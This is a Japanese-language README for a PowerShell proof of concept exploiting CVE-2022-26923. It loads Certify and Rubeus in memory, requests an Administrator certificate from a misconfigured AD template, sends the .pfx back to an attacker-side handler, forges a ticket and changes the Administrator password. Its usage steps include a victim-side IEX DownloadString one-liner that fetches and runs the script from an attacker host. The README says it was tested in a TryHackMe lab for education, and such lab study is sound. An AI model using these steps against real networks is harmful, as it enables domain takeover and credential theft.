CVE-2022-26923-Powershell-POC
Certify と Rubeus をメモリ上に読み込み、自動的に実行するための PowerShell POC です。
仕組み
- Certify.exe と Rubeus.exe をメモリに読み込みます。
- ターゲットマシン上で誤って構成された証明書テンプレートをスキャンします。(詳細: https://www.youtube.com/watch?v=HBRCI5O35R8)
- 脆弱なテンプレートに基づいて、Administrative ユーザーの証明書を要求します。
- 証明書を証明書ハンドラーに送信し、.pfx 形式に変換してクライアントに送り返します。
- Rubeus を使用して証明書を読み込み、Administrative ユーザーのチケットを生成します。
- Administrative ユーザーのパスワードを変更します。(デモのためだけです)
この POC は以下の TryHackMe ラボでテストされています: https://tryhackme.com/room/adcertificatetemplates
この CVE は権限昇格に使用されるため、このデモや THM ラボでは初期侵害は対象としていません。
手順:
- python3 -m http.server 80 [攻撃者マシン]
- python3 uploader.py 8000 [攻撃者マシン]
- IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [被害者マシン]
注: この POC は教育目的です。ご自身の行動に対する責任はあなたにあります。